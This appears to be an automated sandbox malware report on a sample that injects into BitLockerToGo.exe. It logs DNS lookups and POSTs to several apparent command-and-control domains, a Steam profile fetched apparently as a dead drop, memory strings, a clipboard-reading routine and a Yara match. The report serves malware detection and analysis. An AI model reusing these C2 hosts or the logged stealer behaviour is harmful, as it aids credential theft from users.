Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nurserrsjwuwq.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: nurserrsjwuwq.shop
Source: global traffic	DNS traffic detected: DNS query: famikyjdiag.site
Source: global traffic	DNS traffic detected: DNS query: possiwreeste.site
Source: global traffic	DNS traffic detected: DNS query: commandejorsk.site
Source: global traffic	DNS traffic detected: DNS query: underlinemdsj.site
Source: global traffic	DNS traffic detected: DNS query: bellykmrebk.site
Source: global traffic	DNS traffic detected: DNS query: agentyanlark.site
Source: global traffic	DNS traffic detected: DNS query: writekdmsnu.site
Source: global traffic	DNS traffic detected: DNS query: delaylacedmn.site
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: gravvitywio.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: nurserrsjwuwq.shop

Source: webNY0O9Sr.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: webNY0O9Sr.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: webNY0O9Sr.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: webNY0O9Sr.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: webNY0O9Sr.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: webNY0O9Sr.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: webNY0O9Sr.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: webNY0O9Sr.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: webNY0O9Sr.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: webNY0O9Sr.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: webNY0O9Sr.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: webNY0O9Sr.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://commandejorsk.site/api
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://commandejorsk.site/api#
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: webNY0O9Sr.exe	String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.000000000310D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.000000000310D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.000000000310D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://delaylacedmn.site/api
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://delaylacedmn.site/apiR
Source: BitLockerToGo.exe, 00000002.00000003.2289372897.0000000003123000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.0000000003123000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.0000000003123000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/_
Source: BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/api
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/apiI
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: webNY0O9Sr.exe	String found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
Source: webNY0O9Sr.exe	String found in binary or memory: https://manage.windowsazure.com/publishsettings/indexqbusiness.cn-northwest-1.api.amazonwebservices.
Source: webNY0O9Sr.exe	String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexpkcs7:
Source: BitLockerToGo.exe, 00000002.00000002.2291978726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nurserrsjwuwq.shop/api
Source: BitLockerToGo.exe, 00000002.00000002.2291978726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nurserrsjwuwq.shop/api3
Source: BitLockerToGo.exe, 00000002.00000002.2291978726.00000000030E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nurserrsjwuwq.shop/x
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: webNY0O9Sr.exe	String found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comexec:
Source: webNY0O9Sr.exe	String found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/api
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/apii
Source: webNY0O9Sr.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: webNY0O9Sr.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_004392B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_004392B0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_004392B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_004392B0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2258275643.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.2258275643.00000000024DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00410561	2_2_00410561
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00439050	2_2_00439050
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00409035	2_2_00409035
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044C090	2_2_0044C090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040A1C0	2_2_0040A1C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040B1D0	2_2_0040B1D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408270	2_2_00408270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044A200	2_2_0044A200
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401313	2_2_00401313
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E325	2_2_0042E325
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004013C1	2_2_004013C1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004283E6	2_2_004283E6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044C380	2_2_0044C380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00446430	2_2_00446430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00441500	2_2_00441500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044C650	2_2_0044C650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041F617	2_2_0041F617
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00411620	2_2_00411620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00415620	2_2_00415620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040A680	2_2_0040A680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00428768	2_2_00428768
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00403720	2_2_00403720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004078D0	2_2_004078D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004298D1	2_2_004298D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004328F0	2_2_004328F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044A932	2_2_0044A932
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042D9E1	2_2_0042D9E1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044A9E0	2_2_0044A9E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042D9A7	2_2_0042D9A7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00445A00	2_2_00445A00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044AB90	2_2_0044AB90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00440B9A	2_2_00440B9A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042DC47	2_2_0042DC47
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408C50	2_2_00408C50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040BCE0	2_2_0040BCE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044AC90	2_2_0044AC90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040AD40	2_2_0040AD40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044AD70	2_2_0044AD70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00449D20	2_2_00449D20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00448DCF	2_2_00448DCF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00438DF0	2_2_00438DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043FE50	2_2_0043FE50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042BE37	2_2_0042BE37
